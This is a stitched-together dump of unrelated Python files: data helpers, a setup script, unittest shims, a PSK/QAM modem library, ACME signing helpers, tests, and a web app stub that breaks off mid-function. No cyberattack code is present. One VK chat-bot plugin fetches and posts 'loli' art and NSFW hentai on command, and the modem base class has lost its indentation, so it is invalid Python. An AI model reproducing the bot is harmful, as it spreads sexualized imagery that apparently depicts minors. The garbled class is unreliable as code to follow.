def clean_dict_cols(df, cols, key='$'):
    """Return a copy of *df* where, in each column of *cols*, dict values
    are replaced by their entry under *key*; non-dict values pass through
    unchanged. The input frame is not modified.
    """
    result = df.copy()

    def extract(value):
        # unwrap dict cells; leave every other value untouched
        return value.get(key) if isinstance(value, dict) else value

    for column in cols:
        result[column] = result[column].map(extract)
    return result
|
from setuptools import setup
from rak_net import __version__

# Runtime dependencies.
requirements = [
    'binary-utils',
]
# Optional extras: `pip install aio-rak-net[docs]` pulls the doc toolchain.
extras_require = {
    'docs': [
        'sphinx',
        'sphinx-rtd-theme',
    ],
}
# Packages shipped in the distribution.
packages = [
    'rak_net',
]
# The README (reStructuredText) doubles as the PyPI long description.
with open('README.rst') as f:
    readme = f.read()
setup(
    name='aio-rak-net',
    author='L0RD-ZER0',
    url='',
    version=__version__,
    license='MIT',
    description='Async Rak-Net',
    long_description=readme,
    long_description_content_type="text/x-rst",
    install_requires=requirements,
    extras_require=extras_require,
    packages=packages,
)
|
#Write your code below this line 👇
# Read one line from stdin and print how many characters it contains.
user_text = input()
print(len(user_text))
import re
import unittest
def assertIn(self, member, container, msg=None):
    """Just like self.assertTrue(a in b), but with a nicer default message."""
    if member in container:
        return
    if not msg:
        msg = '%r not found in %r' % (member, container)
    self.fail(msg)
unittest.TestCase.assertIn = assertIn
def assertNotIn(self, member, container, msg=None):
    """Just like self.assertTrue(a not in b), but with a nicer default message."""
    if member not in container:
        return
    if not msg:
        msg = '%s unexpectedly found in %s' % (member,
                                               container)
    self.fail(msg)
unittest.TestCase.assertNotIn = assertNotIn
def assertGreater(self, a, b, msg=None):
    """Just like self.assertTrue(a > b), but with a nicer default message."""
    if a > b:
        return
    if not msg:
        msg = '%s not greater than %s' % (a, b)
    self.fail(msg)
unittest.TestCase.assertGreater = assertGreater
def assertRegexpMatches(self, text, expected_regexp, msg=None):
    """Fail the test unless the text matches the regular expression.

    NOTE(review): `basestring` exists only in Python 2; this shim appears to
    backfill the Python-3-style `assertRegex` name onto an old unittest —
    under Python 3 this line raises NameError. Confirm the target runtime.
    """
    if isinstance(expected_regexp, basestring):
        expected_regexp = re.compile(expected_regexp)
    if not expected_regexp.search(text):
        msg = msg or "Regexp didn't match"
        msg = '%s: %r not found in %r' % (msg, expected_regexp.pattern, text)
        raise self.failureException(msg)
unittest.TestCase.assertRegex = assertRegexpMatches
def assertNotRegexpMatches(self, text, unexpected_regexp, msg=None):
    """Fail the test if the text matches the regular expression.

    NOTE(review): `basestring` exists only in Python 2 — see the note on
    assertRegexpMatches about the intended runtime.
    """
    if isinstance(unexpected_regexp, basestring):
        unexpected_regexp = re.compile(unexpected_regexp)
    match = unexpected_regexp.search(text)
    if match:
        msg = msg or "Regexp matched"
        # include the exact matched slice to make the failure actionable
        msg = '%s: %r matches %r in %r' % (msg,
                                           text[match.start():match.end()],
                                           unexpected_regexp.pattern,
                                           text)
        raise self.failureException(msg)
unittest.TestCase.assertNotRegex = assertNotRegexpMatches
def assertIsInstance(self, obj, cls, msg=None):
    """Same as self.assertTrue(isinstance(obj, cls)), with a nicer
    default message."""
    if isinstance(obj, cls):
        return
    if not msg:
        msg = '%s is not an instance of %r' % (obj, cls)
    self.fail(msg)
unittest.TestCase.assertIsInstance = assertIsInstance
|
# coding: utf-8
import numpy as np
import matplotlib.pyplot as plt
class Modem:
def __init__(self, M, gray_map=True, bin_input=True, soft_decision=True, bin_output=True):
N = np.log2(M) # bits per symbol
if N != np.round(N):
raise ValueError("M should be 2**n, with n=1, 2, 3...")
if soft_decision == True and bin_output == False:
raise ValueError("Non-binary output is available only for hard decision")
self.M = M # modulation order
self.N = int(N) # bits per symbol
self.m = [i for i in range(self.M)]
self.gray_map = gray_map
self.bin_input = bin_input
self.soft_decision = soft_decision
self.bin_output = bin_output
''' SERVING METHODS '''
def __gray_encoding(self, dec_in):
""" Encodes values by Gray encoding rule.
Parameters
----------
dec_in : list of ints
Input sequence of decimals to be encoded by Gray.
Returns
-------
gray_out: list of ints
Output encoded by Gray sequence.
"""
bin_seq = [np.binary_repr(d, width=self.N) for d in dec_in]
gray_out = []
for bin_i in bin_seq:
gray_vals = [str(int(bin_i[idx]) ^ int(bin_i[idx - 1]))
if idx != 0 else bin_i[0]
for idx in range(0, len(bin_i))]
gray_i = "".join(gray_vals)
gray_out.append(int(gray_i, 2))
return gray_out
def create_constellation(self, m, s):
""" Creates signal constellation.
Parameters
----------
m : list of ints
Possible decimal values of the signal constellation (0 ... M-1).
s : list of complex values
Possible coordinates of the signal constellation.
Returns
-------
dict_out: dict
Output dictionary where
key is the bit sequence or decimal value and
value is the complex coordinate.
"""
if self.bin_input == False and self.gray_map == False:
dict_out = {k: v for k, v in zip(m, s)}
elif self.bin_input == False and self.gray_map == True:
mg = self.__gray_encoding(m)
dict_out = {k: v for k, v in zip(mg, s)}
elif self.bin_input == True and self.gray_map == False:
mb = self.de2bin(m)
dict_out = {k: v for k, v in zip(mb, s)}
elif self.bin_input == True and self.gray_map == True:
mg = self.__gray_encoding(m)
mgb = self.de2bin(mg)
dict_out = {k: v for k, v in zip(mgb, s)}
return dict_out
def llr_preparation(self):
""" Creates the coordinates
where either zeros or ones can be placed in the signal constellation..
Returns
-------
zeros : list of lists of complex values
The coordinates where zeros can be placed in the signal constellation.
ones : list of lists of complex values
The coordinates where ones can be placed in the signal constellation.
"""
code_book = self.code_book
zeros = [[] for i in range(self.N)]
ones = [[] for i in range(self.N)]
bin_seq = self.de2bin(self.m)
for bin_idx, bin_symb in enumerate(bin_seq):
if self.bin_input == True:
key = bin_symb
else:
key = bin_idx
for possition, digit in enumerate(bin_symb):
if digit == '0':
zeros[possition].append(code_book[key])
else:
ones[possition].append(code_book[key])
return zeros, ones
''' DEMODULATION ALGORITHMS '''
def __ApproxLLR(self, x, noise_var):
    """ Calculates approximate Log-likelihood Ratios (LLRs) [1].
    Parameters
    ----------
    x : 1-D ndarray of complex values
        Received complex-valued symbols to be demodulated.
    noise_var: float
        Additive noise variance.
    Returns
    -------
    result: 1-D ndarray of floats
        Output LLRs, bit-interleaved: result[i*N + b] is the LLR of bit b
        of received symbol i.
    Reference:
    [1] Viterbi, A. J., "An Intuitive Justification and a
    Simplified Implementation of the MAP Decoder for Convolutional Codes,"
    IEEE Journal on Selected Areas in Communications,
    vol. 16, No. 2, pp 260–264, Feb. 1998
    """
    zeros = self.zeros
    ones = self.ones
    LLR = []
    for (zero_i, one_i) in zip(zeros, ones):
        # Squared Euclidean distance from every received symbol to each
        # constellation point carrying a '0' (num) / '1' (denum) at this bit.
        num = [((np.real(x) - np.real(z)) ** 2)
               + ((np.imag(x) - np.imag(z)) ** 2)
               for z in zero_i]
        denum = [((np.real(x) - np.real(o)) ** 2)
                 + ((np.imag(x) - np.imag(o)) ** 2)
                 for o in one_i]
        # Max-log approximation: only the nearest point on each side counts.
        num_post = np.amin(num, axis=0, keepdims=True)
        denum_post = np.amin(denum, axis=0, keepdims=True)
        llr = np.transpose(num_post[0]) - np.transpose(denum_post[0])
        LLR.append(-llr / noise_var)
    # Interleave the per-bit LLR vectors so bits of one symbol are adjacent.
    result = np.zeros((len(x) * len(zeros)))
    for i, llr in enumerate(LLR):
        result[i::len(zeros)] = llr
    return result
''' METHODS TO EXECUTE '''
def modulate(self, msg):
    """ Modulates binary or decimal stream.
    Parameters
    ----------
    msg : 1-D ndarray of ints
        Decimal or binary stream to be modulated.
    Returns
    -------
    modulated : 1-D array of complex values
        Modulated symbols (signal envelope).
    Raises
    ------
    ValueError
        If the input length is not a multiple of log2(M) (binary input),
        or if values fall outside {0, 1} / [0, M-1].
    """
    if (self.bin_input == True) and ((len(msg) % self.N) != 0):
        raise ValueError("The length of the binary input should be a multiple of log2(M)")
    if (self.bin_input == True) and ((max(msg) > 1.) or (min(msg) < 0.)):
        raise ValueError("The input values should be 0s or 1s only!")
    if (self.bin_input == False) and ((max(msg) > (self.M - 1)) or (min(msg) < 0.)):
        raise ValueError("The input values should be in following range: [0, ... M-1]!")
    if self.bin_input:
        # Group the bit stream into N-bit strings; each string keys the code book.
        msg = [str(bit) for bit in msg]
        splited = ["".join(msg[i:i + self.N])
                   for i in range(0, len(msg), self.N)] # subsequences of bits
        modulated = [self.code_book[s] for s in splited]
    else:
        modulated = [self.code_book[dec] for dec in msg]
    return np.array(modulated)
def demodulate(self, x, noise_var=1.):
    """ Demodulates complex symbols.

    Only one algorithm is implemented: approximate LLRs are always computed
    first (soft decision); hard bits or decimals are then derived from the
    LLR signs when requested. Hard-output M-PSK demodulators (see e.g.
    https://www.mathworks.com/help/comm/ref/mpskdemodulatorbaseband.html)
    are deliberately not implemented to reduce the number of schemes, and
    modern channel decoders (convolutional, turbo, LDPC) work better with
    LLRs anyway.

    Parameters
    ----------
    x : 1-D ndarray of complex symbols
        Received symbols to be demodulated.
    noise_var: float
        Additive noise variance.

    Returns
    -------
    result : 1-D array of floats
        Demodulated message: LLRs, a binary sequence, or decimal values,
        depending on the modem configuration.
    """
    llr = self.__ApproxLLR(x, noise_var)
    if self.soft_decision:
        return llr
    hard_bits = (np.sign(-llr) + 1) / 2  # NRZ-to-bin
    return hard_bits if self.bin_output else self.bin2de(hard_bits)
class PSKModem(Modem):
    """M-PSK modem: constellation points equally spaced on the unit circle,
    optionally rotated by a fixed phase."""

    def __init__(self, M, phi=0, gray_map=True, bin_input=True, soft_decision=True, bin_output=True):
        super().__init__(M, gray_map, bin_input, soft_decision, bin_output)
        self.phi = phi  # phase rotation
        # M points on the unit circle, rotated by phi.
        self.s = list(np.exp(1j * self.phi + 1j * 2 * np.pi * np.array(self.m) / self.M))
        self.code_book = self.create_constellation(self.m, self.s)
        self.zeros, self.ones = self.llr_preparation()

    def de2bin(self, decs):
        """ Converts values from decimal to binary representation.
        If the input is binary, the conversion from binary to decimal should be done before.
        Therefore, this supportive method is implemented.
        This method has an additional heuristic:
        the bit sequence of "even" modulation schemes (e.g., QPSK) should be read right to left.
        Parameters
        ----------
        decs : list of ints
            Input decimal values.
        Returns
        -------
        bin_out : list of ints
            Output binary sequences.
        """
        if self.N % 2 == 0:
            # Even bits-per-symbol: reverse each bit string (read right-to-left).
            bin_out = [np.binary_repr(d, width=self.N)[::-1]
                       for d in decs]
        else:
            bin_out = [np.binary_repr(d, width=self.N)
                       for d in decs]
        return bin_out

    def bin2de(self, bin_in):
        """ Converts values from binary to decimal representation.
        Inverse of de2bin, including the right-to-left heuristic for even N.
        Parameters
        ----------
        bin_in : list of ints
            Input binary values.
        Returns
        -------
        dec_out : list of ints
            Output decimal values.
        """
        dec_out = []
        N = self.N  # bits per modulation symbol (local variables are tiny bit faster)
        Ndecs = int(len(bin_in) / N)  # length of the decimal output
        for i in range(Ndecs):
            bin_seq = bin_in[i * N:i * N + N]  # binary equivalent of the one decimal value
            str_o = "".join([str(int(b)) for b in bin_seq])  # binary sequence to string
            if N % 2 == 0:
                # Undo the right-to-left reading applied in de2bin.
                str_o = str_o[::-1]
            dec_out.append(int(str_o, 2))
        return dec_out

    def plot_const(self):
        """ Plots signal constellation """
        const = self.code_book
        fig = plt.figure(figsize=(6, 4), dpi=150)
        for i in list(const):
            x = np.real(const[i])
            y = np.imag(const[i])
            plt.plot(x, y, 'o', color='green')
            # Pick label alignment and offset by quadrant so the text
            # does not overlap the marker.
            if x < 0:
                h = 'right'
                xadd = -.03
            else:
                h = 'left'
                xadd = .03
            if y < 0:
                v = 'top'
                yadd = -.03
            else:
                v = 'bottom'
                yadd = .03
            # Points lying on an axis get centered alignment along that axis.
            if abs(x) < 1e-9 and abs(y) > 1e-9:
                h = 'center'
            elif abs(x) > 1e-9 and abs(y) < 1e-9:
                v = 'center'
            plt.annotate(i, (x + xadd, y + yadd), ha=h, va=v)
        # Conventional scheme names: BPSK, QPSK, else "<M>-PSK".
        if self.M == 2:
            M = 'B'
        elif self.M == 4:
            M = 'Q'
        else:
            M = str(self.M) + "-"
        if self.gray_map:
            mapping = 'Gray'
        else:
            mapping = 'Binary'
        if self.bin_input:
            inputs = 'Binary'
        else:
            inputs = 'Decimal'
        plt.grid()
        plt.axvline(linewidth=1.0, color='black')
        plt.axhline(linewidth=1.0, color='black')
        plt.axis([-1.5, 1.5, -1.5, 1.5])
        plt.title(M + 'PSK, phase rotation: ' + str(round(self.phi, 5)) + \
                  ', Mapping: ' + mapping + ', Input: ' + inputs)
        plt.show()
class QAMModem(Modem):
    """Square M-QAM modem; M must be a square of a power of two (4, 16, 64, ...)."""

    def __init__(self, M, gray_map=True, bin_input=True, soft_decision=True, bin_output=True):
        super().__init__(M, gray_map, bin_input, soft_decision, bin_output)
        # Require sqrt(M) to be an integer power of two (square constellation).
        if np.sqrt(M) != np.fix(np.sqrt(M)) or np.log2(np.sqrt(M)) != np.fix(np.log2(np.sqrt(M))):
            raise ValueError('M must be a square of a power of 2')
        self.m = [i for i in range(self.M)]
        self.s = self.__qam_symbols()
        self.code_book = self.create_constellation(self.m, self.s)
        if self.gray_map:
            self.__gray_qam_arange()
        self.zeros, self.ones = self.llr_preparation()

    def __qam_symbols(self):
        """ Creates M-QAM complex symbols on a square grid with odd-integer
        coordinates (..., -3, -1, 1, 3, ...)."""
        c = np.sqrt(self.M)
        b = -2 * (np.array(self.m) % c) + c - 1
        a = 2 * np.floor(np.array(self.m) / c) - c + 1
        s = list((a + 1j * b))
        return s

    def __gray_qam_arange(self):
        """ This method re-arranges complex coordinates according to Gray coding requirements.
        To implement correct Gray mapping the additional heuristic is used:
        the even "columns" in the signal constellation is complex conjugated.
        """
        for idx, (key, item) in enumerate(self.code_book.items()):
            # Conjugate every other column (idx // sqrt(M) odd) in place.
            if (np.floor(idx / np.sqrt(self.M)) % 2) != 0:
                self.code_book[key] = np.conj(item)

    def de2bin(self, decs):
        """ Converts values from decimal to binary representation.
        Unlike the PSK variant, no bit-order reversal is applied.
        Parameters
        ----------
        decs : list of ints
            Input decimal values.
        Returns
        -------
        bin_out : list of ints
            Output binary sequences.
        """
        bin_out = [np.binary_repr(d, width=self.N) for d in decs]
        return bin_out

    def bin2de(self, bin_in):
        """ Converts values from binary to decimal representation.
        Parameters
        ----------
        bin_in : list of ints
            Input binary values.
        Returns
        -------
        dec_out : list of ints
            Output decimal values.
        """
        dec_out = []
        N = self.N  # bits per modulation symbol (local variables are tiny bit faster)
        Ndecs = int(len(bin_in) / N)  # length of the decimal output
        for i in range(Ndecs):
            bin_seq = bin_in[i * N:i * N + N]  # binary equivalent of the one decimal value
            str_o = "".join([str(int(b)) for b in bin_seq])  # binary sequence to string
            dec_out.append(int(str_o, 2))
        return dec_out

    def plot_const(self):
        """ Plots signal constellation """
        # Scale axis limits and label size with the constellation order.
        if self.M <= 16:
            limits = np.log2(self.M)
            size = 'small'
        elif self.M == 64:
            limits = 1.5 * np.log2(self.M)
            size = 'x-small'
        else:
            limits = 2.25 * np.log2(self.M)
            size = 'xx-small'
        const = self.code_book
        fig = plt.figure(figsize=(6, 4), dpi=150)
        for i in list(const):
            x = np.real(const[i])
            y = np.imag(const[i])
            plt.plot(x, y, 'o', color='red')
            # Pick label alignment and offset by quadrant so the text
            # does not overlap the marker.
            if x < 0:
                h = 'right'
                xadd = -.05
            else:
                h = 'left'
                xadd = .05
            if y < 0:
                v = 'top'
                yadd = -.05
            else:
                v = 'bottom'
                yadd = .05
            # Points lying on an axis get centered alignment along that axis.
            if abs(x) < 1e-9 and abs(y) > 1e-9:
                h = 'center'
            elif abs(x) > 1e-9 and abs(y) < 1e-9:
                v = 'center'
            plt.annotate(i, (x + xadd, y + yadd), ha=h, va=v, size=size)
        M = str(self.M)
        if self.gray_map:
            mapping = 'Gray'
        else:
            mapping = 'Binary'
        if self.bin_input:
            inputs = 'Binary'
        else:
            inputs = 'Decimal'
        plt.grid()
        plt.axvline(linewidth=1.0, color='black')
        plt.axhline(linewidth=1.0, color='black')
        plt.axis([-limits, limits, -limits, limits])
        plt.title(M + '-QAM, Mapping: ' + mapping + ', Input: ' + inputs)
        plt.show()
|
from io import BytesIO
import requests
from duty.objects import dp, MySignalEvent
# Apologies for the sloppy code: the upload logic below is duplicated
# instead of being factored into a shared helper.
@dp.longpoll_event_register('неко')
@dp.my_signal_event_register('неко')
def neko(event: MySignalEvent) -> str:
    """Fetch a random art from loli-art.ru and send it as a VK photo attachment."""
    event.msg_op(2, "⏱️Секунду...")
    art_url = requests.get("https://api.loli-art.ru/arts?count=1").json()["arts"][0]
    picture = BytesIO(requests.get(url=art_url).content)
    picture.name = 'neko.jpg'
    upload_url = event.api('photos.getMessagesUploadServer')['upload_url']
    uploaded = requests.post(upload_url, files={'photo': picture}).json()
    del picture
    saved = event.api('photos.saveMessagesPhoto', photo=uploaded['photo'],
                      hash=uploaded['hash'], server=uploaded['server'])[0]
    attachment = f"photo{saved['owner_id']}_{saved['id']}_{saved['access_key']}"
    event.msg_op(2, "Держи свою Неко :)", attachment=attachment)
@dp.longpoll_event_register('лоли')
@dp.my_signal_event_register('лоли')
def loli(event: MySignalEvent) -> str:
    """Fetch a random art from loli-art.ru and send it as a VK photo attachment."""
    event.msg_op(2, "⏱️Секунду...")
    art_url = requests.get("https://api.loli-art.ru/arts?count=1").json()["arts"][0]
    picture = BytesIO(requests.get(url=art_url).content)
    picture.name = 'neko.jpg'
    upload_url = event.api('photos.getMessagesUploadServer')['upload_url']
    uploaded = requests.post(upload_url, files={'photo': picture}).json()
    del picture
    saved = event.api('photos.saveMessagesPhoto', photo=uploaded['photo'],
                      hash=uploaded['hash'], server=uploaded['server'])[0]
    attachment = f"photo{saved['owner_id']}_{saved['id']}_{saved['access_key']}"
    event.msg_op(2, "Держи свою Лоли :)", attachment=attachment)
@dp.longpoll_event_register('хентай')
@dp.my_signal_event_register('хентай')
def neko_hentai(event: MySignalEvent) -> str:
    """Fetch a random NSFW neko art from waifu.pics and send it as a photo."""
    event.msg_op(2, "⏱️Секунду...")
    art_url = requests.get("https://api.waifu.pics/nsfw/neko").json()['url']
    picture = BytesIO(requests.get(url=art_url).content)
    picture.name = 'neko.jpg'
    upload_url = event.api('photos.getMessagesUploadServer')['upload_url']
    uploaded = requests.post(upload_url, files={'photo': picture}).json()
    del picture
    saved = event.api('photos.saveMessagesPhoto', photo=uploaded['photo'],
                      hash=uploaded['hash'], server=uploaded['server'])[0]
    attachment = f"photo{saved['owner_id']}_{saved['id']}_{saved['access_key']}"
    event.msg_op(2, "Держи свой хентай :)", attachment=attachment)
|
"""Test oscillator response calculation."""
import numpy as np
import pytest
import pyrotd
from .test_spectra import load_at2
osc_freq = 10
def calc_oscillator_resp(motion, osc_damping, resp):
    """Peak oscillator response of *motion* for the given damping and response type."""
    freqs = motion["freqs"]
    fourier_amps = motion["fourier_amps"]
    return pyrotd.calc_oscillator_resp(
        freqs,
        fourier_amps,
        osc_damping,
        osc_freq,
        peak_resp_only=True,
        osc_type=resp,
    )
@pytest.fixture
def motion():
    """Load a recorded motion and compute its one-sided Fourier amplitude spectrum."""
    time_step, accels = load_at2("RSN8883_14383980_13849090.AT2")
    fourier_amps = np.fft.rfft(accels)
    # Frequencies run from DC up to the Nyquist frequency 1 / (2 * dt).
    freqs = np.linspace(0, 1.0 / (2 * time_step), num=fourier_amps.size)
    keys = ("time_step", "accels", "freqs", "fourier_amps")
    values = (time_step, accels, freqs, fourier_amps)
    return dict(zip(keys, values))
@pytest.mark.parametrize(
    "resp,power",
    [
        ("sa", 0),
        ("psv", 1),
        ("sv", 1),
        ("sd", 2),
    ],
)
def test_osc_resp(motion, resp, power):
    """Each response type should match PSA once scaled by (2*pi*f)^power.

    For very light damping everything should be the same.
    """
    osc_damping = 0.005
    ref_psa = calc_oscillator_resp(motion, osc_damping, "psa")
    # Reuse the module-level helper instead of duplicating the pyrotd call.
    calc_resp = calc_oscillator_resp(motion, osc_damping, resp)
    # Convert to PSA
    calc_psa = calc_resp * (2 * np.pi * osc_freq) ** power
    np.testing.assert_allclose(calc_psa, ref_psa, rtol=1e-1)
@pytest.mark.xfail(strict=True)
def test_sa(motion):
    """SA and PSA diverge at 1% damping; this tight comparison must fail (xfail)."""
    osc_damping = 0.010
    ref_psa = calc_oscillator_resp(motion, osc_damping, "psa")
    # Reuse the module-level helper instead of duplicating the pyrotd call.
    calc_psa = calc_oscillator_resp(motion, osc_damping, "sa")
    np.testing.assert_allclose(calc_psa, ref_psa, rtol=1e-2)
|
import base64, subprocess, json
from urllib.request import urlopen, Request
def _base64(text):
"""Encodes string as base64 as specified in the ACME RFC."""
return base64.urlsafe_b64encode(text).decode("utf8").rstrip("=")
def _openssl(command, options, communicate=None):
    """Run an `openssl <command>` subprocess; return stdout, raise IOError on failure."""
    proc = subprocess.Popen(
        ["openssl", command] + options,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
    )
    stdout, stderr = proc.communicate(communicate)
    if proc.returncode != 0:
        raise IOError("OpenSSL Error: {0}".format(stderr))
    return stdout
def _cmd(cmd_list, stdin=None, cmd_input=None, err_msg="Command Line Error"):
"""helper function - run external commands"""
proc = subprocess.Popen(cmd_list, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate(cmd_input)
if proc.returncode != 0:
raise IOError("{0}\n{1}".format(err_msg, err))
return out
def _do_request(url, data=None, err_msg="Error", depth=0):
    """helper function - make request and automatically parse json response

    Returns (resp_data, code, headers). Raises IndexError for a bad-nonce
    ACME error (so callers can retry) and ValueError for any other non-2xx
    response.
    """
    try:
        resp = urlopen(Request(url, data=data, headers={"Content-Type": "application/jose+json", "User-Agent": "acme-tiny"}))
        resp_data, code, headers = resp.read().decode("utf8"), resp.getcode(), resp.headers
    except IOError as e:
        # HTTPError exposes the body via read(); other IOErrors do not.
        resp_data = e.read().decode("utf8") if hasattr(e, "read") else str(e)
        code, headers = getattr(e, "code", None), {}
    try:
        resp_data = json.loads(resp_data) # try to parse json results
    except ValueError:
        pass # ignore json parsing errors
    # Guard the lookup: a 400 body is not guaranteed to be a JSON object with
    # a "type" key (the old resp_data['type'] could raise KeyError/TypeError).
    if depth < 100 and code == 400 and isinstance(resp_data, dict) \
            and resp_data.get('type') == "urn:ietf:params:acme:error:badNonce":
        raise IndexError(resp_data) # allow 100 retrys for bad nonces
    if code not in [200, 201, 204]:
        raise ValueError("{0}:\nUrl: {1}\nData: {2}\nResponse Code: {3}\nResponse: {4}".format(err_msg, url, data, code, resp_data))
    return resp_data, code, headers
def _send_signed_request(url, payload, directory, alg, acct_headers, account_key, jwk, err_msg, depth=0):
    """Sign *payload* with the account key and POST it to *url* as a JWS.

    A fresh nonce is fetched per attempt; bad-nonce responses (raised as
    IndexError by _do_request) are retried up to the depth limit enforced
    there. Returns the (resp_data, code, headers) triple from _do_request.
    """
    payload64 = "" if payload is None else _base64(json.dumps(payload).encode('utf8'))
    new_nonce = _do_request(directory['newNonce'])[2]['Replay-Nonce']
    protected = {"url": url, "alg": alg, "nonce": new_nonce}
    # Before the account exists we must embed the full JWK; afterwards the
    # account URL ("kid") identifies the key.
    protected.update({"jwk": jwk} if acct_headers is None else {"kid": acct_headers['Location']})
    protected64 = _base64(json.dumps(protected).encode('utf8'))
    protected_input = "{0}.{1}".format(protected64, payload64).encode('utf8')
    out = _cmd(["openssl", "dgst", "-sha256", "-sign", account_key], stdin=subprocess.PIPE, cmd_input=protected_input, err_msg="OpenSSL Error")
    data = json.dumps({"protected": protected64, "payload": payload64, "signature": _base64(out)})
    try:
        return _do_request(url, data=data.encode('utf8'), err_msg=err_msg, depth=depth)
    except IndexError: # retry bad nonces (they raise IndexError)
        # BUG FIX: the retry previously called _send_signed_request(url,
        # payload, err_msg, ...), dropping directory/alg/acct_headers/
        # account_key/jwk and passing err_msg where directory belongs,
        # so every retry raised TypeError. Forward all arguments.
        return _send_signed_request(url, payload, directory, alg, acct_headers, account_key, jwk, err_msg, depth=(depth + 1))
|
import pytest
from ebl.dictionary.domain.word import WordId
from ebl.transliteration.domain import atf
from ebl.transliteration.domain.dollar_line import RulingDollarLine
from ebl.transliteration.domain.enclosure_tokens import BrokenAway
from ebl.transliteration.domain.language import Language
from ebl.transliteration.domain.line import ControlLine, EmptyLine
from ebl.transliteration.domain.line_number import LineNumber
from ebl.transliteration.domain.markup import EmphasisPart, LanguagePart, StringPart
from ebl.transliteration.domain.note_line import NoteLine
from ebl.transliteration.domain.sign_tokens import Reading
from ebl.transliteration.domain.text import Text
from ebl.transliteration.domain.text_line import TextLine
from ebl.transliteration.domain.tokens import Joiner, ValueToken, Variant
from ebl.transliteration.domain.word_tokens import Word
@pytest.mark.parametrize(
"old,new,expected",
[
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Reading.of_name("ha"),
Joiner.hyphen(),
Reading.of_name("am"),
]
)
],
),
ControlLine("#", " comment"),
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Reading.of_name("ha"),
Joiner.hyphen(),
Reading.of_name("am"),
]
)
],
),
ControlLine("#", " comment"),
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Reading.of_name("ha"),
Joiner.hyphen(),
Reading.of_name("am"),
]
)
],
),
ControlLine("#", " comment"),
]
),
),
(
Text.of_iterable([EmptyLine()]),
Text.of_iterable([RulingDollarLine(atf.Ruling.SINGLE)]),
Text.of_iterable([RulingDollarLine(atf.Ruling.SINGLE)]),
),
(
Text.of_iterable(
[
RulingDollarLine(atf.Ruling.DOUBLE),
RulingDollarLine(atf.Ruling.SINGLE),
EmptyLine(),
]
),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE), EmptyLine()]),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE), EmptyLine()]),
),
(
Text.of_iterable([EmptyLine(), RulingDollarLine(atf.Ruling.DOUBLE)]),
Text.of_iterable(
[
EmptyLine(),
RulingDollarLine(atf.Ruling.SINGLE),
RulingDollarLine(atf.Ruling.DOUBLE),
]
),
Text.of_iterable(
[
EmptyLine(),
RulingDollarLine(atf.Ruling.SINGLE),
RulingDollarLine(atf.Ruling.DOUBLE),
]
),
),
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[Reading.of_name("nu")], unique_lemma=(WordId("nu I"),)
),
Word.of(
[Reading.of_name("nu")], unique_lemma=(WordId("nu I"),)
),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of([Reading.of_name("mu")]),
Word.of([Reading.of_name("nu")]),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of([Reading.of_name("mu")]),
Word.of(
[Reading.of_name("nu")], unique_lemma=(WordId("nu I"),)
),
],
)
]
),
),
(
Text.of_iterable([ControlLine("$", " double ruling")]),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE)]),
Text.of_iterable([RulingDollarLine(atf.Ruling.DOUBLE)]),
),
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Variant.of(
Reading.of([ValueToken.of("k[ur")]),
Reading.of([ValueToken.of("r[a")]),
)
]
),
BrokenAway.close(),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Variant.of(
Reading.of(
[
ValueToken.of("k"),
BrokenAway.open(),
ValueToken.of("ur"),
]
),
Reading.of(
[
ValueToken.of("r"),
BrokenAway.open(),
ValueToken.of("a"),
]
),
)
]
),
BrokenAway.close(),
],
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1),
[
Word.of(
[
Variant.of(
Reading.of(
[
ValueToken.of("k"),
BrokenAway.open(),
ValueToken.of("ur"),
]
),
Reading.of(
[
ValueToken.of("r"),
BrokenAway.open(),
ValueToken.of("a"),
]
),
)
]
),
BrokenAway.close(),
],
)
]
),
),
(
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1), [Word.of([Reading.of_name("bu")])]
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1), [Word.of([Reading.of_name("bu")])]
)
]
),
Text.of_iterable(
[
TextLine.of_iterable(
LineNumber(1), [Word.of([Reading.of_name("bu")])]
)
]
),
),
(
Text.of_iterable([NoteLine((StringPart("this is a note "),))]),
Text.of_iterable([NoteLine((StringPart("this is another note "),))]),
Text.of_iterable([NoteLine((StringPart("this is another note "),))]),
),
(
Text.of_iterable([NoteLine((StringPart("this is a note "),))]),
Text.of_iterable([NoteLine((EmphasisPart("this is a note "),))]),
Text.of_iterable([NoteLine((EmphasisPart("this is a note "),))]),
),
(
Text.of_iterable(
[
NoteLine(
(
LanguagePart.of_transliteration(
Language.AKKADIAN, (ValueToken.of("bu"),)
),
)
)
]
),
Text.of_iterable(
[
NoteLine(
(
LanguagePart.of_transliteration(
Language.AKKADIAN, (Word.of([Reading.of_name("bu")]),)
),
)
)
]
),
Text.of_iterable(
[
NoteLine(
(
LanguagePart.of_transliteration(
Language.AKKADIAN, (Word.of([Reading.of_name("bu")]),)
),
)
)
]
),
),
],
)
def test_merge(old: Text, new: Text, expected: Text) -> None:
    """Merging *new* into *old* must equal *expected* and carry the new parser version."""
    new_version = f"{old.parser_version}-test"
    merged = old.merge(new.set_parser_version(new_version))
    assert merged == expected.set_parser_version(new_version)
|
from ktech_python.api import API
from ktech_python.middleware import Middleware
app = API()
def custom_exception_handler(request, response, exception_cls):
    # Render any unhandled exception as plain text in the response body.
    response.text = str(exception_cls)

app.add_exception_handler(custom_exception_handler)
@app.route("/home")
def home(request, response):
response.text = "Hello from the HOME page"
@app.route("/about")
def about(request, response):
response.text = "Hello from the ABOUT page"
@app.route("/hello/{name}")
def greeting(request, response, name):
